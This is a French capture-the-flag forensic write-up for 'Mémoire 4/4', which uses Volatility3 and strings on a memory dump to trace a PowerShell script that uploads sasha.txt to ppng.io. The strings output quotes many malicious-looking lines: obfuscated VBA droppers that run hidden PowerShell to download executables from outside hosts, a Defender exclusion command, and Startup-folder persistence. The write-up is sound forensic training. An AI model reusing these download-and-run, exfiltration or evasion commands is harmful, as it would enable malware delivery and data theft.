ThaySan
  • 👋Bienvenue
    • Avant-propos
  • 🚩CTF & Writeups
    • 2025 | EC2
      • Let's Crax
    • 2025 | HackDay
      • 🔑Cryptographie
        • Drunk Christmas
        • Find Eve 1
        • Well hidden message - Standard Code Encryption
      • 🔎Forensic
        • Copperwire Extraction
        • Distracted user
        • I believe you can't fly
      • 🧠Misc
        • Hello Steve
      • 💾Programmation
        • Lonely bot
        • Lonely bot #2
        • Lonely bot #3
        • Useless Animals Sorting
        • Who cares about SSI anyway ?
      • ⚙️Reverse
        • Just dig
        • Rusty_rev
        • The Cogs of Blackmail
      • 🎭Steganographie
        • It says a lot when there is no music
        • Mona LSB
        • Well hidden message - Insignificant blue
      • 🌐Web
        • Super Website Verificator 3000
        • The analytical engine leak
        • The Watchful Gears: Uncover the Secrets Within
        • Your region's finest
    • 2024 | Efrei - CyberNight
      • 🔑Cryptographie
        • Clavier spécial
        • Le futur
        • Securechain 30.0
        • Cascade
        • Shared Flag
        • Weird Algorithm
      • 🧊Minecraft
        • Introduction
        • Non aux Bouquins Trafiqués
        • Redstone Gold Block
      • 💾Programmation
        • Captcha 1.0
        • Intro à la prog
        • Captcha 2.0
      • ⚙️Reverse
        • Reverse the Reverse
        • Find me if you can
        • HuGO Decrypt
        • Kitten eXORcism
        • M30W Vault Tech
        • The Ugandan Labyrinth
      • 🎭Stéganographie
        • Le message
        • bon Le ordre
        • COD FORFLAG
        • Mauvaise note
        • Bruit
        • Un (un ?) drôle de QR code
        • Randonnée Guillerette à Bordeaux
      • 💻Système
        • Marche-pied
        • Escabot
        • régulation des Données et des Normes de Sécurité
      • 🌐Web
        • cybernight.zip
        • Mon champion préféré
        • Co(mpressed)okies
        • Gitty Mistake
        • JWT Kiddo
        • Parseur Farceur
      • L'enquête
        • L'enquête 2/6
        • L'Enquête 1/6
        • Bienvenue, enquêteur
    • 2024 | Star-Hack
      • 🔑Cryptographie
        • César, mais pas César
        • Double ennui
        • Langage secret
        • Quadratique Mystérieuse
        • ReSultAt
        • Sup3r S3cr3t
        • Warmup
      • 🔎Forensic
        • Cache-cache
        • Fichier ZIP protégé par mot de passe
        • HEADER
        • Investigation 1
        • Investigation 2
      • 🧠Misc
        • B4l4d3 Urb41n3
        • Bruhh, c'est quoi ça ?
        • Cut13
        • Pika Pika
      • 😈Pwn
        • Pwn0x01
        • Pwn0x02
        • Pwn0x03
      • ⚙️Reverse
        • Assembly
        • Rev0x00
        • Rev0x01
        • Rev0x02
      • 🌐Web
        • Clone Udemy
        • Flask
        • Guess_The_Passcode
        • PHP
        • Tickets
        • Usine de Cookies
    • 2024 | ECW
      • 🔑Cryptographie
        • Course hipPIN
    • 2024 | CTFREI Intro
      • 🔑Cryptographie
        • AES Intro
        • Aléatoire
        • Game of Luck
        • RSA Intro
        • RSA2
        • RSA3
      • 🔎Forensic
        • Mais qui est le photographe ?
        • Mais où est passé mon flag ?
        • Mémoire 1/4
        • Mémoire 2/4
        • Mémoire 3/4
        • Mémoire 4/4
        • My computer is talking
      • 📚OSINT
        • Avion ✈
        • Geoint
        • Google!
        • Googlint
        • Le pivot
        • Le temps commence maintenant
        • Sacré dossier
        • Socint
      • 💾Programmation
        • Try Me
        • Answer Me
        • Eval Me
        • Time Based
      • 😈Pwn
        • BOF Intro
        • Shop
        • BOF 2
        • BOF win()
      • ⚙️Reverse
        • CrackMe1
        • CrackMe2
        • CrackMe3
        • Hidden...
        • Something changed?
        • ZZZ
      • 🎭Stéganographie
        • Cybernight être comme
        • Joli paysage
        • Petit poisson
        • StegHide 'n' Seek
        • Un canard pas comme les autres
      • 💻Système
        • Bash Jail
        • Bash Jail Revenge
        • BrokenBin
        • GTFO Of Here
        • Pyjail
        • Pyjail Revenge
        • Strange input, right?
      • 🌐Web
        • SQLi
        • POST This Money
        • Give me my Flask PIN
        • Access
        • Render
        • RenderV2
        • Touchy
    • 2024 | DefCamp
      • 🔑Cryptographie
        • conv
        • oracle-srl
        • ctr
      • 🔎Forensic
        • i-got-a-virus
        • Alternating
        • call-me-pliz
      • 🧠Misc
        • pyterm
      • 📱Mobile
        • mobisec
      • 📚OSINT
      • 😈Pwn
      • ⚙️Reverse
      • 🕵️Traque
      • 🌐Web
        • noogle
        • production-bay
    • 2024 | 404CTF
      • 🔑Cryptographie
        • Bébé nageur
        • Le petit bain
        • Poor Random Number Generator [1/2]
        • Plongeon Rapide Super Artistique
        • J'éponge donc j'essuie
        • Poor Random Number Generator [2/2]
        • La Seine
        • J'ai glissé chef !
        • SEA - La face cachée de l'Iceberg
      • 🔎Forensic
        • Le tir aux logs
        • Darts Bank
        • Vaut mieux sécuriser que guérir
        • De bons croissants au beurre
        • Poids Raw vs. Cours Jette [1/3]
      • 🔌Hardware
        • Serial killer
        • Le soulevé de GND
        • Comment est votre modulation ? [1/2]
        • Sea side channel [1/4] - Introduction
        • Comment est votre modulation ? [2/2]
        • Sea side channel [2/4] - Reconnaissance
        • Sea side channel [3/4] - Mais où sont les triggers ?
      • 🤖IA
        • Du poison [1/2]
        • Du poison [2/2]
        • Des portes dérobées
      • 🧠Misc
        • Discord
        • De la friture sur la ligne
        • Bienvenue
        • Revers(ibl)e Engineering [0/2]
      • 📚OSINT
        • Légende
        • Not on my watch
        • Secret Training [1/2]
      • 😈Pwn
        • Pseudoverflow
        • Jean Pile
        • Mordu du 100m
        • Antismash
      • 🐈‍⬛Quantique
        • Des trains superposés
        • De l'écoute, pas très discrète
        • De la multiplicité des problèmes
      • ⚙️Reverse
        • ⭐Échauffement
        • ⭐Intronisation du CHAUSSURE
        • ⭐Bugdroid Fight [1/2]
        • ⭐Revers(ibl)e Engineering [1/2]
        • ⭐Bugdroid Fight [2/2]
        • ⭐Nanocombattants
        • ⭐Revers(ibl)e Engineering [2/2]
        • Le Tableau Noir
      • 🎭Stéganographie
        • ⭐L'absence
        • ⭐Regarder en stéréo
        • ⭐La Barre Fixe
        • ⭐Le grand écart
        • ⭐La chute
      • 🌐Web
        • ⭐Vous êtes en RETARD
        • ⭐Le match du siècle [1/2]
        • ⭐Exploit mag
        • ⭐Le match du siècle [2/2]
        • ⭐LE GORFOU 42
        • ⭐La boutique officielle
    • 2024 | CTFREI - Bordeaux
      • 🔑Cryptographie
        • zzz
      • 📚OSINT
        • Alexis Dumas
        • Back to the bureau
        • Dr Octopus
        • Folie et ambition
        • GeoGuessr
        • Hugo Nelots : prélude
        • La fin ?
        • La fuite Dumas
        • Un réseau suspect
      • 💾Programmation
        • Eval me 1
        • Eval me 2
        • Time Based
      • 💻Système
        • Broken Binary 1
        • Broken Binary 2
        • GTFO of here
        • Pyjail 1
        • Pyjail 2
        • Pyjail 3
        • Pyjail 4
      • 🌐Web
        • Au commencement était le verb
        • Becadmin
        • PHP Juggler
    • 2024 | HTB - Cyber Apocalypse Challenges
      • 🔗Blockchain
        • Lucky Faucet
        • Recovery
        • Russian Roulette
      • 🔑Cryptographie
        • Blunt
        • Dynastic
        • Iced TEA
        • Makeshift
        • Primary Knowledge
      • 🔎Forensic
        • An unusual sighting
        • Data Siege
        • Fake Boost
        • Game Invitation
        • It Has Begun
        • Phreaky
        • Pursue The Tracks
        • Urgent
      • 🔌Hardware
        • BunnyPass
        • Flash-ing Logs
        • Maze
        • Rids
        • The PROM
      • 🧠Misc
        • Character
        • Cubicle Riddle
        • Path of Survival
        • Stop Drop and Roll
        • Unbreakable
        • Were Pickle Phreaks
        • Were Pickle Phreaks Revenge
      • 😈Pwn
        • Delulu
        • Pet Companion
        • Tutorial
        • Writing on the Wall
      • ⚙️Reverse
        • BoxCutter
        • Crushing
        • FollowThePath
        • LootStash
        • MazeOfPower
        • Metagaming
        • PackedAway
        • QuickScan
      • 🌐Web
        • Flag Command
        • KORP Terminal
        • Labyrinth Linguist
        • LockTalk
        • Testimonial
        • TimeKORP
    • 2024 | UNbreakable
      • 🔑Cryptographie
        • start-enc
        • traffic-e
      • 🔎Forensic
        • easy-hide
        • password-manager-is-a-must
      • 🧠Misc
        • rfc-meta
      • 📱Mobile
        • flagen
        • improper-configuration
      • 📡Network
        • wifi-basic
        • wifiland
      • 📚OSINT
        • persistent-reccon
        • safe-password
      • 😈Pwn
        • intro-to-assembly
      • ⚙️Reverse
        • fake-add
      • 🎭Stéganographie
        • secrets-of-winter
      • 🌐Web
        • pygment
        • sided-curl
        • you-can-trust-me
    • 2023 | EFREI - CyberNight
      • 📚OSINT
        • Invest Now !
      • 😈Pwn
        • NSA Call Converter
      • ⚙️Reverse
        • CryptoVirus
        • WebChaussettes
      • 🌐Web
        • DoctoLeak
    • 2023 | Flag4All
      • 🔑Cryptographie
        • Aes IV
        • Crypt my loop
        • Kentucky fried chicken
        • RSA primes
        • Xor
    • 2022 | EFREI - CyberNight
      • 🔑Cryptographie
        • Coupé-décalé
        • ExFILEtration
        • Il s'est baissé ou pas
        • J'ai pas roté
        • Les allemands !
        • RSA Strong Prime generator
      • 🔎Forensic
        • Bomberman 1/2
        • Bomberman 2/2
        • Magic
        • Peu importe le chemin
        • Sniff sniff
        • Souvenir
        • Xray
      • 🔌Hardware
        • Class4
        • Find me 2/3
        • Identify 1/3
        • Yo listen 3/3
      • 🧠Misc
        • Et je tombe tombe tombe
        • Des yeux partout
        • RiGOLe
        • Roomba tricheur
        • Survey
        • Tinder
      • 💾Programmation
        • Repeat
        • Startup
        • Timing
      • ⚙️Reverse
        • Auth 1
        • Auth2
        • Auth3
        • Cryptoroomba
        • Tenet
      • 🎭Stéganographie
        • 50 shades of stephane legar
        • Chess master
        • Deviens champion sers toi de tout ce que tu as appris
        • Drifting in the bits
        • Pyramide
        • Spirale
      • 🌐Web
        • Ah bah c'est du propre
        • Cooking roomba
        • Leaderboard
        • vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
Propulsé par GitBook
Sur cette page
  • Challenge
  • Solution

Cet article vous a-t-il été utile ?

  1. CTF & Writeups
  2. 2024 | CTFREI Intro
  3. Forensic

Mémoire 4/4

PrécédentMémoire 3/4SuivantMy computer is talking

Dernière mise à jour il y a 7 mois

Cet article vous a-t-il été utile ?

Catégorie: Forensic Difficulté: - Flag: CTFREI{160.16.213.98_http://ppng.io/sasha_POPOPOKEMON}

Challenge

Le fichier est trop large, il est disponible sur

Description

Cette fois-ci, il semblerait qu'un script PowerShell étrange tourne sur ma machine. Aide moi à analyser son comportement.

Le flag est composé de :

  • L'IP contactée par le processus

  • L'URL utilisée par le script

  • Le contenu envoyé

Format : CTFREI{8.8.8.8_https://ctfrei.fr/flag_MEGASCRIPT}

Note : Le fichier est le même pour les 4 étapes

sha1: c91d17b27d8bf5df0830bd6104801b065cca6ee9

Solution

On commence par lister ce qu'il s'est passé sur le réseau grâce au plugin windows.netscan et en filtrant avec le terme powershell :

$ volatility3 -f memory.vmem windows.netscan | grep -i "powershell"

0x960351b38010.0TCPv4   192.168.19.156 49901 160.16.213.98   80      ESTABLISHED     2788    powershell.exe  2024-09-12 10:52:05.000000

On découvre un seul résultat, et l'IP qui nous intéresse est 160.16.213.98. On remarque également que c'est sur le port 80, donc une requête HTTP (c'est important pour la suite).

Maintenant, il faut chercher ce qui a été envoyé, pour ça on commence par faire un strings sur le fichier .vmem au complet et que l'on va sauvegarder à côté pour travailler dessus plus facilement.

strings memory.vmem > strings.txt

Il est important de mettre en relation de ce que l'on sait :

  • La requête est faite via PowerShell

  • Il s'agit d'une requête HTTP

$ cat memory_strings.txt | grep -i "Invoke-WebRequest .*http://"

shell ("powershell.exe -command 'invoke-webrequest http://
Invoke-WebRequest -Uri ""http://3.65.2.139/read/Booking-02.exe"" -OutFile TrojanDownloader:O97M/Powdow.KG!MTB
Invoke-WebRequest -Uri ""http://3.65.2.139/read/Ltrwmpfgvbk.exe"" -OutFile
8psowerss = "powers"she = "shel"CreateObject("Outlook.Application")sease = "Hidde"CreateObject("wscript." & she & "l").exec(psowerss & "hell -w " & sease & "n Invoke-WebRequest -Uri " &Chr(34) & "http://scaladevelopments.scaladevco.com/
powershell -Command "Invoke-WebRequest -Uri 'http://146.190.48.229/fuackme100.exe' -OutFile 'C:\Windows\Temp\file1.exe'"Trojan:Win64/CobaltStrike.SPQ!MTB
Invoke-WebRequest -Uri ""http://62.233.57.190/z1/PTT_20230707-WA01120xlsx.exe"" -OutFile $TempFile; Start-Process $TempFile;TrojanDownloader:O97M/Powdow.STY!MTB
WinHttpReq.Open "GET", myURL, False, "username", "password"http://192.168.100.5/testdata.txtSaveToFile "C:\Users\Enigma\source\repos\02rev\mytest.txt", 2 ' 1PowerShell -Command ""{Invoke-WebRequest -Uri http://192.168.100.5/testdata.txt -OutFileEnviron("USERPROFILE") & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetLogger.exe
NCreateObject("wscript." & she & "l")exec("powe" & "rshell -w Hidden Invoke-WebRequest -Uri Chr(34) & "http://178.17.171.144/sch/
powershell -executionpolicy unrestricted -command "invoke-webrequest 'http://124.106.197.167add-mppreference -exclusionpath 'c:\perflogs'bypass -confirm:$false -force
 "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main= Environ("TEMP") & "\powershdll.dll"{ Invoke-WebRequest -useb http://
Invoke-WebRequest -Uri "http://ppng.io/sasha" -Method Put -InFile ".\sasha.txt"`
    Invoke-WebRequest -Uri "http://ppng.io/sasha" -Method Put -InFile ".\sasha.txt" -UseBasicParsing`
Invoke-WebRequest -Uri "http://ppng.io/sasha" -Method Put -InFile ".\sasha.txt" -UseBasicParsing`
Shell ("powershell.exeInvoke-WebRequest http://mailicious.com/filemanager.exe -OutFile C:\\filemanager.exe
.CreateObject("wscript." & she & "l").exec(psowerss & "hell -w Hidden Invoke-WebRequest -Urihttp://landing.yetiapp.ec/IDx6/FLP_5012_306_171.ex& "C:\Users\Public\Documents\checkgirl.ex"
.CreateObject("wscript." & she & "l").exec(psowerss & "hell -w " & sease & "n Invoke-WebRequest -Urihttp://scaladevelopments.scaladevco.com/13Z/IMG_001263082.exC:\Users\Public\Documents\technologypurpose.ex"
Invoke-WebRequest -Uri "http://ppng.io/sasha" -Method Put -InFile ".\sasha.txt" -UseBasicParsing

On a filtré quasiment tout avec les informations à notre disposition, il ne reste plus qu'à déterminer laquelle de ces commandes est la bonne.

Parmi les URLs, on voit http://ppng.io/sasha, un petit nslookup dessus nous permet de savoir qu'elle est l'IP du serveur

$ nslookup ppng.io

Réponse ne faisant pas autorité :
Nom :    ppng.io
Address:  160.16.213.98

Bingo, c'est la même que celle qu'on a trouvée au tout début. La commande envoi le fichier sasha.txt, on va refaire un grep dessus pour découvrir son emplacement.

$ volatility3 -f memory.vmem windows.filescan | grep-i "sasha.txt"
0x960353465920.0\Users\Aramis\Desktop\sasha.txt 216
0x960356e0b2c0  \Users\Aramis\Desktop\sasha.txt 216

On le récupère le fichier avec le plugin windows.dumpfiles puis on affiche son contenu :

$ volatility3 -f memory.vmem windows.dumpfiles --virtaddr 0x960353465920

Volatility 3 Framework 2.7.0
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0x960353465920  sasha.txt       file.0x960353465920.0x960358485d10.DataSectionObject.sasha.txt.dat
SharedCacheMap  0x960353465920  sasha.txt       file.0x960353465920.0x960355327750.SharedCacheMap.sasha.txt.vacb


$ cat file.0x960353465920.0x960358485d10.DataSectionObject.sasha.txt.dat
POPOPOKEMON

On a tout ce qui nous faut : l'IP, le nom de domaine et le contenu du fichier envoyé.

Pour faire une requête HTTP en Powershell, on utilise . Malheureusement, ce n'est pas suffisant pour discriminer tous les résultats de la commande strings précédente. On va alors aussi limiter celles faites sur de l'HTTP et non HTTPS :

🚩
🔎
MEGA
Invoke-WebRequest